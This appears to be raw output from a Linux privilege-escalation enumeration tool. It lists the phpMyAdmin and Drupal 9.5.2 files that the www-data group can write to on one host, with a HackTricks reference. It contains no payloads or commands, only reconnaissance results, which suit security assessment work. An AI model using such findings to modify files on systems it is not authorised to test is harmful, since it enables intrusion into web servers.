/opt/phpMyAdmin/js/dist/setup/ajax.js
/opt/phpMyAdmin/js/dist/setup/scripts.js
/opt/phpMyAdmin/js/dist/shortcuts_handler.js
/opt/phpMyAdmin/js/dist/sql.js
/opt/phpMyAdmin/js/dist/table
/opt/phpMyAdmin/js/dist/table/change.js
/opt/phpMyAdmin/js/dist/table/chart.js
/opt/phpMyAdmin/js/dist/table/find_replace.js
/opt/phpMyAdmin/js/dist/table/gis_visualization.js
/opt/phpMyAdmin/js/dist/table/operations.js
#)You_can_write_even_more_files_inside_last_directory

/opt/phpMyAdmin/js/dist/transformations
/opt/phpMyAdmin/js/dist/transformations/image_upload.js
/opt/phpMyAdmin/js/dist/transformations/json.js
/opt/phpMyAdmin/js/dist/transformations/json_editor.js
/opt/phpMyAdmin/js/dist/transformations/sql_editor.js
/opt/phpMyAdmin/js/dist/transformations/xml.js
#)You_can_write_even_more_files_inside_last_directory

/opt/phpMyAdmin/js/dist/u2f.js
/opt/phpMyAdmin/js/messages.php
/opt/phpMyAdmin/js/src
/opt/phpMyAdmin/js/src/ajax.js
/opt/phpMyAdmin/js/src/chart.js
/opt/phpMyAdmin/js/src/codemirror
/opt/phpMyAdmin/js/src/codemirror/addon
/opt/phpMyAdmin/js/src/codemirror/addon/lint
/opt/phpMyAdmin/js/src/codemirror/addon/lint/sql-lint.js
/opt/phpMyAdmin/js/src/common.js
/opt/phpMyAdmin/js/src/config.js
/opt/phpMyAdmin/js/src/console.js
/opt/phpMyAdmin/js/src/cross_framing_protection.js
/opt/phpMyAdmin/js/src/database
/opt/phpMyAdmin/js/src/database/central_columns.js
/opt/phpMyAdmin/js/src/database/events.js
/opt/phpMyAdmin/js/src/database/multi_table_query.js
/opt/phpMyAdmin/js/src/database/operations.js
/opt/phpMyAdmin/js/src/database/qbe.js
#)You_can_write_even_more_files_inside_last_directory

/opt/phpMyAdmin/js/src/designer
/opt/phpMyAdmin/js/src/designer/database.js
/opt/phpMyAdmin/js/src/designer/history.js
/opt/phpMyAdmin/js/src/designer/init.js
/opt/phpMyAdmin/js/src/designer/move.js
/opt/phpMyAdmin/js/src/designer/objects.js
#)You_can_write_even_more_files_inside_last_directory

/opt/phpMyAdmin/js/src/doclinks.js
/opt/phpMyAdmin/js/src/drag_drop_import.js
/opt/phpMyAdmin/js/src/error_report.js
/opt/phpMyAdmin/js/src/export.js
/opt/phpMyAdmin/js/src/export_output.js
#)You_can_write_even_more_files_inside_last_directory

/opt/phpMyAdmin/js/src/jqplot/plugins
/opt/phpMyAdmin/js/src/jqplot/plugins/jqplot.byteFormatter.js
/opt/phpMyAdmin/js/src/jquery.sortable-table.js
/opt/phpMyAdmin/js/src/keyhandler.js
/opt/phpMyAdmin/js/src/makegrid.js
/opt/phpMyAdmin/js/src/menu_resizer.js
/opt/phpMyAdmin/js/src/multi_column_sort.js
#)You_can_write_even_more_files_inside_last_directory

/opt/phpMyAdmin/js/src/server/databases.js
/opt/phpMyAdmin/js/src/server/plugins.js
/opt/phpMyAdmin/js/src/server/privileges.js
/opt/phpMyAdmin/js/src/server/status
/opt/phpMyAdmin/js/src/server/status/monitor.js
/opt/phpMyAdmin/js/src/server/status/processes.js
/opt/phpMyAdmin/js/src/server/status/queries.js
/opt/phpMyAdmin/js/src/server/status/sorter.js
/opt/phpMyAdmin/js/src/server/status/variables.js
/opt/phpMyAdmin/js/src/server/user_groups.js
/opt/phpMyAdmin/js/src/server/variables.js
/opt/phpMyAdmin/js/src/setup
/opt/phpMyAdmin/js/src/setup/ajax.js
/opt/phpMyAdmin/js/src/setup/scripts.js
/opt/phpMyAdmin/js/src/shortcuts_handler.js
/opt/phpMyAdmin/js/src/sql.js
/opt/phpMyAdmin/js/src/table
/opt/phpMyAdmin/js/src/table/change.js
/opt/phpMyAdmin/js/src/table/chart.js
/opt/phpMyAdmin/js/src/table/find_replace.js
/opt/phpMyAdmin/js/src/table/gis_visualization.js
/opt/phpMyAdmin/js/src/table/operations.js
#)You_can_write_even_more_files_inside_last_directory

/opt/phpMyAdmin/js/src/transformations
/opt/phpMyAdmin/js/src/transformations/image_upload.js
/opt/phpMyAdmin/js/src/transformations/json.js
/opt/phpMyAdmin/js/src/transformations/json_editor.js
/opt/phpMyAdmin/js/src/transformations/sql_editor.js
/opt/phpMyAdmin/js/src/transformations/xml.js
#)You_can_write_even_more_files_inside_last_directory

/opt/phpMyAdmin/js/src/u2f.js
/opt/phpMyAdmin/js/vendor
/opt/phpMyAdmin/js/vendor/bootstrap
/opt/phpMyAdmin/js/vendor/bootstrap/bootstrap.bundle.min.js
/opt/phpMyAdmin/js/vendor/bootstrap/bootstrap.bundle.min.js.map
/opt/phpMyAdmin/js/vendor/codemirror
/opt/phpMyAdmin/js/vendor/codemirror/LICENSE
/opt/phpMyAdmin/js/vendor/codemirror/addon
/opt/phpMyAdmin/js/vendor/codemirror/addon/hint
/opt/phpMyAdmin/js/vendor/codemirror/addon/hint/show-hint.css
/opt/phpMyAdmin/js/vendor/codemirror/addon/hint/show-hint.js
/opt/phpMyAdmin/js/vendor/codemirror/addon/hint/sql-hint.js
/opt/phpMyAdmin/js/vendor/codemirror/addon/lint
/opt/phpMyAdmin/js/vendor/codemirror/addon/lint/lint.css
/opt/phpMyAdmin/js/vendor/codemirror/addon/lint/lint.js
/opt/phpMyAdmin/js/vendor/codemirror/addon/runmode
/opt/phpMyAdmin/js/vendor/codemirror/addon/runmode/runmode.js
/opt/phpMyAdmin/js/vendor/codemirror/lib
/opt/phpMyAdmin/js/vendor/codemirror/lib/codemirror.css
/opt/phpMyAdmin/js/vendor/codemirror/lib/codemirror.js
/opt/phpMyAdmin/js/vendor/codemirror/mode
/opt/phpMyAdmin/js/vendor/codemirror/mode/javascript
/opt/phpMyAdmin/js/vendor/codemirror/mode/javascript/javascript.js
/opt/phpMyAdmin/js/vendor/codemirror/mode/sql
/opt/phpMyAdmin/js/vendor/codemirror/mode/sql/sql.js
/opt/phpMyAdmin/js/vendor/codemirror/mode/xml
/opt/phpMyAdmin/js/vendor/codemirror/mode/xml/xml.js
/opt/phpMyAdmin/js/vendor/jqplot
/opt/phpMyAdmin/js/vendor/jqplot/jquery.jqplot.js
/opt/phpMyAdmin/js/vendor/jqplot/plugins
/opt/phpMyAdmin/js/vendor/jqplot/plugins/jqplot.barRenderer.js
/opt/phpMyAdmin/js/vendor/jqplot/plugins/jqplot.canvasAxisLabelRenderer.js
/opt/phpMyAdmin/js/vendor/jqplot/plugins/jqplot.canvasTextRenderer.js
/opt/phpMyAdmin/js/vendor/jqplot/plugins/jqplot.categoryAxisRenderer.js
/opt/phpMyAdmin/js/vendor/jqplot/plugins/jqplot.cursor.js
#)You_can_write_even_more_files_inside_last_directory

/opt/phpMyAdmin/js/vendor/jquery
/opt/phpMyAdmin/js/vendor/jquery/MIT-LICENSE.txt
/opt/phpMyAdmin/js/vendor/jquery/additional-methods.js
/opt/phpMyAdmin/js/vendor/jquery/jquery-migrate.js
/opt/phpMyAdmin/js/vendor/jquery/jquery-ui-timepicker-addon.js
/opt/phpMyAdmin/js/vendor/jquery/jquery-ui.min.js
#)You_can_write_even_more_files_inside_last_directory

/opt/phpMyAdmin/js/vendor/js.cookie.js
/opt/phpMyAdmin/js/vendor/openlayers
/opt/phpMyAdmin/js/vendor/openlayers/OpenLayers.js
/opt/phpMyAdmin/js/vendor/openlayers/OpenLayers.js.map
/opt/phpMyAdmin/js/vendor/openlayers/theme
/opt/phpMyAdmin/js/vendor/openlayers/theme/ol.css
/opt/phpMyAdmin/js/vendor/sprintf.js
/opt/phpMyAdmin/js/vendor/tracekit.js
/opt/phpMyAdmin/js/vendor/u2f-api-polyfill.js
/opt/phpMyAdmin/js/vendor/zxcvbn-ts.js
/opt/phpMyAdmin/js/vendor/zxcvbn-ts.js.map
/opt/phpMyAdmin/libraries
/opt/phpMyAdmin/libraries/advisory_rules_generic.php
/opt/phpMyAdmin/libraries/advisory_rules_mysql_before80003.php
/opt/phpMyAdmin/libraries/cache
/opt/phpMyAdmin/libraries/cache/routes.cache.php
/opt/phpMyAdmin/libraries/classes
/opt/phpMyAdmin/libraries/classes/Advisor.php
/opt/phpMyAdmin/libraries/classes/Bookmark.php
/opt/phpMyAdmin/libraries/classes/BrowseForeigners.php
/opt/phpMyAdmin/libraries/classes/Cache.php
/opt/phpMyAdmin/libraries/classes/Charsets
#)You_can_write_even_more_files_inside_last_directory

/opt/phpMyAdmin/libraries/classes/Charsets/Charset.php
/opt/phpMyAdmin/libraries/classes/Charsets/Collation.php
/opt/phpMyAdmin/libraries/classes/CheckUserPrivileges.php
/opt/phpMyAdmin/libraries/classes/Command
/opt/phpMyAdmin/libraries/classes/Command/CacheWarmupCommand.php
/opt/phpMyAdmin/libraries/classes/Command/FixPoTwigCommand.php
/opt/phpMyAdmin/libraries/classes/Command/SetVersionCommand.php
/opt/phpMyAdmin/libraries/classes/Command/TwigLintCommand.php
/opt/phpMyAdmin/libraries/classes/Command/WriteGitRevisionCommand.php
/opt/phpMyAdmin/libraries/classes/Common.php
/opt/phpMyAdmin/libraries/classes/Config
/opt/phpMyAdmin/libraries/classes/Config.php
/opt/phpMyAdmin/libraries/classes/Config/ConfigFile.php
/opt/phpMyAdmin/libraries/classes/Config/Descriptions.php
/opt/phpMyAdmin/libraries/classes/Config/Form.php
/opt/phpMyAdmin/libraries/classes/Config/FormDisplay.php
/opt/phpMyAdmin/libraries/classes/Config/FormDisplayTemplate.php
#)You_can_write_even_more_files_inside_last_directory

/opt/phpMyAdmin/libraries/classes/Config/Forms/BaseForm.php
/opt/phpMyAdmin/libraries/classes/Config/Forms/BaseFormList.php
/opt/phpMyAdmin/libraries/classes/Config/Forms/Page
/opt/phpMyAdmin/libraries/classes/Config/Forms/Page/BrowseForm.php
/opt/phpMyAdmin/libraries/classes/Config/Forms/Page/DbStructureForm.php
/opt/phpMyAdmin/libraries/classes/Config/Forms/Page/EditForm.php
/opt/phpMyAdmin/libraries/classes/Config/Forms/Page/ExportForm.php
/opt/phpMyAdmin/libraries/classes/Config/Forms/Page/ImportForm.php
#)You_can_write_even_more_files_inside_last_directory

/opt/phpMyAdmin/libraries/classes/Config/Forms/Setup
/opt/phpMyAdmin/libraries/classes/Config/Forms/Setup/ConfigForm.php
/opt/phpMyAdmin/libraries/classes/Config/Forms/Setup/ExportForm.php
/opt/phpMyAdmin/libraries/classes/Config/Forms/Setup/FeaturesForm.php
/opt/phpMyAdmin/libraries/classes/Config/Forms/Setup/ImportForm.php
/opt/phpMyAdmin/libraries/classes/Config/Forms/Setup/MainForm.php
#)You_can_write_even_more_files_inside_last_directory

/opt/phpMyAdmin/libraries/classes/Config/Forms/User
/opt/phpMyAdmin/libraries/classes/Config/Forms/User/ExportForm.php
/opt/phpMyAdmin/libraries/classes/Config/Forms/User/FeaturesForm.php
/opt/phpMyAdmin/libraries/classes/Config/Forms/User/ImportForm.php
/opt/phpMyAdmin/libraries/classes/Config/Forms/User/MainForm.php
/opt/phpMyAdmin/libraries/classes/Config/Forms/User/NaviForm.php
#)You_can_write_even_more_files_inside_last_directory

/opt/phpMyAdmin/libraries/classes/Config/PageSettings.php
/opt/phpMyAdmin/libraries/classes/Config/ServerConfigChecks.php
/opt/phpMyAdmin/libraries/classes/Config/Settings
/opt/phpMyAdmin/libraries/classes/Config/Settings.php
/opt/phpMyAdmin/libraries/classes/Config/Settings/Console.php
/opt/phpMyAdmin/libraries/classes/Config/Settings/Debug.php
/opt/phpMyAdmin/libraries/classes/Config/Settings/Export.php
/opt/phpMyAdmin/libraries/classes/Config/Settings/Import.php
/opt/phpMyAdmin/libraries/classes/Config/Settings/Schema.php
#)You_can_write_even_more_files_inside_last_directory

/opt/phpMyAdmin/libraries/classes/Config/SpecialSchemaLinks.php
/opt/phpMyAdmin/libraries/classes/Config/Validator.php
/opt/phpMyAdmin/libraries/classes/ConfigStorage
/opt/phpMyAdmin/libraries/classes/ConfigStorage/Features
/opt/phpMyAdmin/libraries/classes/ConfigStorage/Features/BookmarkFeature.php
/opt/phpMyAdmin/libraries/classes/ConfigStorage/Features/BrowserTransformationFeature.php
/opt/phpMyAdmin/libraries/classes/ConfigStorage/Features/CentralColumnsFeature.php
/opt/phpMyAdmin/libraries/classes/ConfigStorage/Features/ColumnCommentsFeature.php
/opt/phpMyAdmin/libraries/classes/ConfigStorage/Features/ConfigurableMenusFeature.php
#)You_can_write_even_more_files_inside_last_directory

/opt/phpMyAdmin/libraries/classes/ConfigStorage/Relation.php
/opt/phpMyAdmin/libraries/classes/ConfigStorage/RelationCleanup.php
/opt/phpMyAdmin/libraries/classes/ConfigStorage/RelationParameters.php
/opt/phpMyAdmin/libraries/classes/ConfigStorage/UserGroups.php
/opt/phpMyAdmin/libraries/classes/Console.php
/opt/phpMyAdmin/libraries/classes/Controllers
/opt/phpMyAdmin/libraries/classes/Controllers/AbstractController.php
/opt/phpMyAdmin/libraries/classes/Controllers/BrowseForeignersController.php
/opt/phpMyAdmin/libraries/classes/Controllers/ChangeLogController.php
/opt/phpMyAdmin/libraries/classes/Controllers/CheckRelationsController.php
/opt/phpMyAdmin/libraries/classes/Controllers/CollationConnectionController.php
#)You_can_write_even_more_files_inside_last_directory

/opt/phpMyAdmin/libraries/classes/Controllers/Config/GetConfigController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Config/SetConfigController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Database
/opt/phpMyAdmin/libraries/classes/Controllers/Database/AbstractController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Database/CentralColumns
/opt/phpMyAdmin/libraries/classes/Controllers/Database/CentralColumns/PopulateColumnsController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Database/CentralColumnsController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Database/DataDictionaryController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Database/DesignerController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Database/EventsController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Database/ExportController.php
#)You_can_write_even_more_files_inside_last_directory

/opt/phpMyAdmin/libraries/classes/Controllers/Database/MultiTableQuery/QueryController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Database/MultiTableQuery/TablesController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Database/MultiTableQueryController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Database/Operations
/opt/phpMyAdmin/libraries/classes/Controllers/Database/Operations/CollationController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Database/OperationsController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Database/PrivilegesController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Database/QueryByExampleController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Database/RoutinesController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Database/SearchController.php
#)You_can_write_even_more_files_inside_last_directory

/opt/phpMyAdmin/libraries/classes/Controllers/Database/Structure/AddPrefixController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Database/Structure/AddPrefixTableController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Database/Structure/CentralColumns
/opt/phpMyAdmin/libraries/classes/Controllers/Database/Structure/CentralColumns/AddController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Database/Structure/CentralColumns/MakeConsistentController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Database/Structure/CentralColumns/RemoveController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Database/Structure/ChangePrefixFormController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Database/Structure/CopyFormController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Database/Structure/CopyTableController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Database/Structure/CopyTableWithPrefixController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Database/Structure/DropFormController.php
#)You_can_write_even_more_files_inside_last_directory

/opt/phpMyAdmin/libraries/classes/Controllers/Database/StructureController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Database/TrackingController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Database/TriggersController.php
/opt/phpMyAdmin/libraries/classes/Controllers/DatabaseController.php
/opt/phpMyAdmin/libraries/classes/Controllers/ErrorReportController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Export
/opt/phpMyAdmin/libraries/classes/Controllers/Export/CheckTimeOutController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Export/ExportController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Export/TablesController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Export/Template
/opt/phpMyAdmin/libraries/classes/Controllers/Export/Template/CreateController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Export/Template/DeleteController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Export/Template/LoadController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Export/Template/UpdateController.php
/opt/phpMyAdmin/libraries/classes/Controllers/GisDataEditorController.php
/opt/phpMyAdmin/libraries/classes/Controllers/GitInfoController.php
/opt/phpMyAdmin/libraries/classes/Controllers/HomeController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Import
/opt/phpMyAdmin/libraries/classes/Controllers/Import/ImportController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Import/SimulateDmlController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Import/StatusController.php
/opt/phpMyAdmin/libraries/classes/Controllers/JavaScriptMessagesController.php
/opt/phpMyAdmin/libraries/classes/Controllers/LicenseController.php
/opt/phpMyAdmin/libraries/classes/Controllers/LintController.php
/opt/phpMyAdmin/libraries/classes/Controllers/LogoutController.php
/opt/phpMyAdmin/libraries/classes/Controllers/NavigationController.php
#)You_can_write_even_more_files_inside_last_directory

/opt/phpMyAdmin/libraries/classes/Controllers/Preferences/ExportController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Preferences/FeaturesController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Preferences/ImportController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Preferences/MainPanelController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Preferences/ManageController.php
#)You_can_write_even_more_files_inside_last_directory

/opt/phpMyAdmin/libraries/classes/Controllers/RecentTablesListController.php
/opt/phpMyAdmin/libraries/classes/Controllers/SchemaExportController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Server
/opt/phpMyAdmin/libraries/classes/Controllers/Server/BinlogController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Server/CollationsController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Server/Databases
/opt/phpMyAdmin/libraries/classes/Controllers/Server/Databases/CreateController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Server/Databases/DestroyController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Server/DatabasesController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Server/EnginesController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Server/ExportController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Server/ImportController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Server/PluginsController.php
#)You_can_write_even_more_files_inside_last_directory

/opt/phpMyAdmin/libraries/classes/Controllers/Server/Privileges/AccountLockController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Server/Privileges/AccountUnlockController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Server/PrivilegesController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Server/ReplicationController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Server/ShowEngineController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Server/SqlController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Server/Status
/opt/phpMyAdmin/libraries/classes/Controllers/Server/Status/AbstractController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Server/Status/AdvisorController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Server/Status/Monitor
/opt/phpMyAdmin/libraries/classes/Controllers/Server/Status/Monitor/ChartingDataController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Server/Status/Monitor/GeneralLogController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Server/Status/Monitor/LogVarsController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Server/Status/Monitor/QueryAnalyzerController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Server/Status/Monitor/SlowLogController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Server/Status/MonitorController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Server/Status/Processes
/opt/phpMyAdmin/libraries/classes/Controllers/Server/Status/Processes/KillController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Server/Status/Processes/RefreshController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Server/Status/ProcessesController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Server/Status/QueriesController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Server/Status/StatusController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Server/Status/VariablesController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Server/UserGroupsController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Server/UserGroupsFormController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Server/Variables
/opt/phpMyAdmin/libraries/classes/Controllers/Server/Variables/GetVariableController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Server/Variables/SetVariableController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Server/VariablesController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Setup
/opt/phpMyAdmin/libraries/classes/Controllers/Setup/AbstractController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Setup/ConfigController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Setup/FormController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Setup/HomeController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Setup/ServersController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Sql
/opt/phpMyAdmin/libraries/classes/Controllers/Sql/ColumnPreferencesController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Sql/DefaultForeignKeyCheckValueController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Sql/EnumValuesController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Sql/RelationalValuesController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Sql/SetValuesController.php
#)You_can_write_even_more_files_inside_last_directory

/opt/phpMyAdmin/libraries/classes/Controllers/Table
/opt/phpMyAdmin/libraries/classes/Controllers/Table/AbstractController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Table/AddFieldController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Table/ChangeController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Table/ChangeRowsController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Table/ChartController.php
#)You_can_write_even_more_files_inside_last_directory

/opt/phpMyAdmin/libraries/classes/Controllers/Table/Maintenance/AnalyzeController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Table/Maintenance/CheckController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Table/Maintenance/ChecksumController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Table/Maintenance/OptimizeController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Table/Maintenance/RepairController.php
/opt/phpMyAdmin/libraries/classes/Controllers/Table/OperationsController.php

╔══════════╣ Interesting GROUP writable files (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
  Group www-data:
/srv/web/drupal-9.5.2
/srv/web/drupal-9.5.2/themes
/srv/web/drupal-9.5.2/themes/README.txt
/srv/web/drupal-9.5.2/core
/srv/web/drupal-9.5.2/core/globals.api.php
/srv/web/drupal-9.5.2/core/.gitignore
/srv/web/drupal-9.5.2/core/config
/srv/web/drupal-9.5.2/core/config/schema
/srv/web/drupal-9.5.2/core/config/schema/core.extension.schema.yml
/srv/web/drupal-9.5.2/core/config/schema/core.menu.schema.yml
/srv/web/drupal-9.5.2/core/config/schema/core.entity.schema.yml
/srv/web/drupal-9.5.2/core/config/schema/core.data_types.schema.yml
/srv/web/drupal-9.5.2/core/config/install
/srv/web/drupal-9.5.2/core/config/install/core.menu.static_menu_link_overrides.yml
/srv/web/drupal-9.5.2/core/config/install/core.extension.yml
/srv/web/drupal-9.5.2/core/themes
/srv/web/drupal-9.5.2/core/themes/seven
/srv/web/drupal-9.5.2/core/themes/seven/config
/srv/web/drupal-9.5.2/core/themes/seven/config/optional
/srv/web/drupal-9.5.2/core/themes/seven/config/optional/block.block.seven_help_search.yml
/srv/web/drupal-9.5.2/core/themes/seven/config/schema
/srv/web/drupal-9.5.2/core/themes/seven/config/schema/seven.schema.yml
/srv/web/drupal-9.5.2/core/themes/seven/css
/srv/web/drupal-9.5.2/core/themes/seven/css/theme
/srv/web/drupal-9.5.2/core/themes/seven/css/theme/filter.admin.css
/srv/web/drupal-9.5.2/core/themes/seven/css/theme/install-page.css
/srv/web/drupal-9.5.2/core/themes/seven/css/theme/update-report.css
/srv/web/drupal-9.5.2/core/themes/seven/css/theme/media-library.css
/srv/web/drupal-9.5.2/core/themes/seven/css/theme/ckeditor-admin.css
#)You_can_write_even_more_files_inside_last_directory

/srv/web/drupal-9.5.2/core/themes/seven/css/layout
/srv/web/drupal-9.5.2/core/themes/seven/css/layout/layout.css
/srv/web/drupal-9.5.2/core/themes/seven/css/layout/node-add.css
/srv/web/drupal-9.5.2/core/themes/seven/css/base
/srv/web/drupal-9.5.2/core/themes/seven/css/base/elements.css
/srv/web/drupal-9.5.2/core/themes/seven/css/base/print.css
/srv/web/drupal-9.5.2/core/themes/seven/css/base/typography.css
/srv/web/drupal-9.5.2/core/themes/seven/css/classy
/srv/web/drupal-9.5.2/core/themes/seven/css/classy/layout
/srv/web/drupal-9.5.2/core/themes/seven/css/classy/layout/media-library.css
/srv/web/drupal-9.5.2/core/themes/seven/css/classy/README.txt
/srv/web/drupal-9.5.2/core/themes/seven/css/classy/components
/srv/web/drupal-9.5.2/core/themes/seven/css/classy/components/tabledrag.css
/srv/web/drupal-9.5.2/core/themes/seven/css/classy/components/media-embed-error.css
/srv/web/drupal-9.5.2/core/themes/seven/css/classy/components/forum.css
/srv/web/drupal-9.5.2/core/themes/seven/css/classy/components/pager.css
/srv/web/drupal-9.5.2/core/themes/seven/css/classy/components/more-link.css
#)You_can_write_even_more_files_inside_last_directory

/srv/web/drupal-9.5.2/core/themes/seven/css/components
/srv/web/drupal-9.5.2/core/themes/seven/css/components/admin-list.css
/srv/web/drupal-9.5.2/core/themes/seven/css/components/quickedit.css
/srv/web/drupal-9.5.2/core/themes/seven/css/components/user.css
/srv/web/drupal-9.5.2/core/themes/seven/css/components/dropbutton.component.css
/srv/web/drupal-9.5.2/core/themes/seven/css/components/pager.css
#)You_can_write_even_more_files_inside_last_directory

/srv/web/drupal-9.5.2/core/themes/seven/css/components/jquery.ui/theme.css
/srv/web/drupal-9.5.2/core/themes/seven/css/components/system-status-counter.css
/srv/web/drupal-9.5.2/core/themes/seven/seven.libraries.yml
/srv/web/drupal-9.5.2/core/themes/seven/js
/srv/web/drupal-9.5.2/core/themes/seven/js/nav-tabs.es6.js
/srv/web/drupal-9.5.2/core/themes/seven/js/mobile.install.es6.js
/srv/web/drupal-9.5.2/core/themes/seven/js/nav-tabs.js
/srv/web/drupal-9.5.2/core/themes/seven/js/classy
/srv/web/drupal-9.5.2/core/themes/seven/js/classy/media_embed_ckeditor.theme.es6.js
/srv/web/drupal-9.5.2/core/themes/seven/js/classy/README.txt
/srv/web/drupal-9.5.2/core/themes/seven/js/classy/media_embed_ckeditor.theme.js
/srv/web/drupal-9.5.2/core/themes/seven/js/responsive-details.es6.js
/srv/web/drupal-9.5.2/core/themes/seven/js/responsive-details.js
/srv/web/drupal-9.5.2/core/themes/seven/js/mobile.install.js
/srv/web/drupal-9.5.2/core/themes/seven/README.txt
/srv/web/drupal-9.5.2/core/themes/seven/seven.breakpoints.yml
/srv/web/drupal-9.5.2/core/themes/seven/tests
/srv/web/drupal-9.5.2/core/themes/seven/tests/src
/srv/web/drupal-9.5.2/core/themes/seven/tests/src/Functional
/srv/web/drupal-9.5.2/core/themes/seven/tests/src/Functional/SevenLayoutBuilderTest.php
/srv/web/drupal-9.5.2/core/themes/seven/seven.info.yml
/srv/web/drupal-9.5.2/core/themes/seven/images
/srv/web/drupal-9.5.2/core/themes/seven/images/classy
/srv/web/drupal-9.5.2/core/themes/seven/images/classy/README.txt
/srv/web/drupal-9.5.2/core/themes/seven/images/classy/icons
/srv/web/drupal-9.5.2/core/themes/seven/images/icons
/srv/web/drupal-9.5.2/core/themes/seven/images/icons/cccccc
/srv/web/drupal-9.5.2/core/themes/seven/seven.theme
/srv/web/drupal-9.5.2/core/themes/seven/templates
/srv/web/drupal-9.5.2/core/themes/seven/templates/entity-add-list.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/menu-local-tasks.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/media-library
/srv/web/drupal-9.5.2/core/themes/seven/templates/media-library/views-view--media_library.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/media-library/fieldset--media-library-widget.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/media-library/item-list--media-library-add-form-media-list.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/media-library/views-view-unformatted--media-library.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/media-library/details--media-library-add-form-selected-media.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/status-report-grouped.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/text_format
/srv/web/drupal-9.5.2/core/themes/seven/templates/text_format/container--text-format-filter-help.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/text_format/container--text-format-filter-guidelines.html.twig
